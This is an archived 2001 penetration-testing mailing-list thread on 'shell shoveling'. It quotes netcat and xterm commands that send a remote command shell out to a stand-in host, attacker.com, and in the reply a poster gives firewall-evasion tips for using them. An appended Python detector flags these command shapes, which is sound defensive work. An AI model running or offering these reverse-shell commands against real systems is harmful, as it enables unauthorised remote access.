Penetration Testing mailing list archives

Re:Shell Shoveling?!?


From: "bluefur0r bluefur0r" <bluefur0r () drea ms>
Date: 2 Oct 2001 19:05:44 -0000

That's rather amusing, because I used that exact command last night... Except I changed the ports because of firewall
reasons... The reason I had to use it was because they were running BlackIce on the webserver and a fw1 box was in front of
that as well. A misconfigured firewall allowed outbound transmissions, and hence that exact command came into play. I
suggest trying higher ports and not using port 80; I bet you 5 dollars if you attempt to set up a listener on port 80
you'll get hit with nimda before your shell gets to you =). It worked quite well, except do not try using commands like
ftp (it seemed to mess with my listeners a bit). Instead use the ol' ftp -s: switch and create a file with the list of
ftp commands. Hope this helps!
blue
On Tue, 2 Oct 2001 11:15:28 -0700, "Junginger, Jeremy" <jjunginger () Calence com> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have you guys ever heard of shell shoveling? In playing with NetCat
and reading an infoworld article, I came across a couple of concepts
that I found fascinating.  Below are the explanations and command
lines:

"If the attacker machine is listening with netcat on TCP 80 and 25,
and TCP 80 is allowed inbound and 25 outbound to/from the victim
through the firewall, then this command "shovels" a remote command
shell from victim to attacker.com."

nc attacker.com 80 | cmd.exe | nc attacker.com 25

"If Xterm (TCP 6000) is allowed outbound without restriction, then
the following command would be a nifty Unix equivalent to the above
example:"

xterm -display attacker.com:0.0 &

I am planning on using this in an upcoming p.t. and wanted to gain
your insights!  Thanks!



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv
0Em+lFGcjjX00Jd6eTEGSSFw
=BUzY
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
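
Added example, not part of either poster's message: detection logic for the two command shapes quoted in this thread, run over process command lines as a host sensor might log them. The function names, the binary-name sets and the sample records are assumptions constructed for illustration; attacker.com is the placeholder host used in the quoted article.

```python
import re
import shlex

SHELLS = {"cmd", "cmd.exe", "sh", "bash"}          # assumed interpreter names
NET_CLIENTS = {"nc", "nc.exe", "ncat", "netcat"}   # assumed netcat binary names
LOCAL_DISPLAYS = {"", "unix", "localhost", "127.0.0.1"}

def _base(token):
    """Lower-cased file name of a program token, for Windows or Unix paths."""
    return re.split(r"[\\/]", token.strip('"'))[-1].lower()

def _stages(cmdline):
    """Split a logged command line on '|' into argv lists (quoted pipes not handled)."""
    return [shlex.split(p, posix=False) for p in cmdline.split("|") if p.strip()]

def classify(cmdline):
    """Return (rule, detail) if the line matches a shoveled-shell shape, else None."""
    stages = _stages(cmdline)
    names = [_base(argv[0]) for argv in stages]
    # Shape 1: a network client feeds a shell whose output feeds another client.
    for i in range(1, len(stages) - 1):
        if (names[i] in SHELLS and names[i - 1] in NET_CLIENTS
                and names[i + 1] in NET_CLIENTS):
            peers = [":".join(stages[j][-2:]) for j in (i - 1, i + 1)]
            return ("shell-between-net-clients", peers)
    # Shape 2: xterm told to draw on a display that is not local.
    for argv in stages:
        if _base(argv[0]) == "xterm" and "-display" in argv[:-1]:
            display = argv[argv.index("-display") + 1]
            if display.rsplit(":", 1)[0].lower() not in LOCAL_DISPLAYS:
                return ("xterm-remote-display", [display])
    return None

SAMPLE_CMDLINES = [  # constructed process-creation records, not real log data
    "nc attacker.com 80 | cmd.exe | nc attacker.com 25",
    r"C:\tools\nc.exe 192.0.2.10 8080 | C:\WINNT\system32\cmd.exe | C:\tools\nc.exe 192.0.2.10 8443",
    "xterm -display attacker.com:0.0 &",
    "xterm -display :0.0",
    r"type C:\logs\ex011002.log | findstr 404",
]

def scan(cmdlines):
    """Pair each flagged command line with its finding."""
    results = ((c, classify(c)) for c in cmdlines)
    return [(c, f) for c, f in results if f]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE_CMDLINES):
        print(finding, "<-", line)
```

The rule keys on the shape of the pipeline rather than on port numbers, so it still matches when the ports are moved off 80 and 25 as the reply describes.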


